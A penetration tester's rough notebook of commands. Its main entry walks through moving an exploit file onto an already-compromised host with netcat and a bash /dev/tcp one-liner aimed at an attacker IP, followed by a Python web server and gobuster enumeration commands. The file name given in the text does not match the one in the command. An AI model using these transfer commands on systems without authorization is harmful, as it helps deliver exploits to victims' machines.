Useful Pentesting Commands (rough notebook)

This is more of a reference of lesser used commands that I required in engagements. You may find these useful as well so here you go. More stuff will be included to have them as a handy reference primarily to myself. 

File Transfers

Inbound file transfer via Bash

Several guides online on how to open a reverse shell over bash, send a file over bash, but not much info on how to receive a file over bash. You can either learn all the fun stuff about streams and descriptors over here or use this as a shortcut. 

This is useful in severely limited environments where nc, wget or other command that makes for easy file transfers is not available. If you have ever encountered a shell restricted with Firejail, you will surely appreciate this. It's particularly frustrating when you a reverse shell on the target but it's hard to move your exploit files on to it. The following scenario assumes that: 

  1. You have a listener on your attacker machine that is ready to send the exploit file.
  2. You have nc on your attacker machine (duh). 
  3. You already have a pre-established shell or reverse-shell to the target. 

Attacker's machine: 

$ nc -nlvp 4445 < exploit.py

The above command waits and sends the contents of exploit.py to whoever connects to your machine on port 4445. 

On the target machine, assuming you already have another reverse shell: 

exec 3<> /dev/tcp/<ATTACKER IP>/4445; while read -r 0<&3; do printf '%s\n' "$REPLY" >> /tmp/our_exploit.txt; done;

This points a socket connection to your attacker's machine to a descriptor named 3. 

We read from this '3' descriptor, and dump the reply to the /tmp/the_exploit.py file. The read -r is used to prevent backslash interpretation and have the destination file identical to the one being sent. 

You can now kill the socket connection and you should be able to find your file transferred over good old bash networking. There's likely a more efficient or shorter command to do this, but this worked fine as a quick and easy hack during my last engagement.

Simple Webserver

python -m 'http.server' 80

Preliminary Enumeration

gobuster dir -u http://<HOST> -w ./wordlist.txt

gobuster vhost -w <SUBDOMAIN_LIST.TXT> -u <TARGET_HOST> -- append-domain